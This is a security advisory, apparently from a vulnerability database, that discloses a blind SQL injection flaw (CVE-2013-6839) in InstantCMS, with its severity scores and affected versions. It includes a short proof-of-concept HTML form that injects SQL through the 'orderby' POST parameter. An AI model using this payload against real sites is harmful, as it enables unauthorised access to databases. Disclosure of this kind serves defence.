Lucene search

High-Tech BridgeHTB23185

HistoryNov 20, 2013 - 12:00 a.m.

SQL Injection in InstantCMS

2013-11-2000:00:00

High-Tech Bridge

www.htbridge.com

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.003 Low

EPSS

Percentile

62.9%

JSON

High-Tech Bridge Security Research Lab discovered blind SQL injection vulnerability in InstantCMS, which can be exploited to perform SQL Injection attacks, alter SQL requests and compromise vulnerable application.

SQL Injection in InstantCMS: CVE-2013-6839
The vulnerability exists due to insufficient filtration of “orderby” HTTP POST parameter passed to “/catalog/[id]” URL. A remote unauthenticated attacker can execute arbitrary SQL commands in application’s database.
Simple exploit code below uses blind SQL injection exploitation technique, and will display different order of records on the page if MySQL version is 5.:
<form action=“http://[host]/catalog/2” method=“post” name=“main”>
<input type=“hidden” name=“orderby” value="(-pubdate(substring(version(),1,1)=5))">
<input type=“hidden” name=“orderto” value=“asc”>
<input type=“submit” id=“btn”>
</form>

CPENameOperatorVersion
instantcmsle1.10.3

CPE	Name	Operator	Version
	instantcms	le	1.10.3

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.003 Low

EPSS

Percentile

62.9%

JSON

Related for HTB23185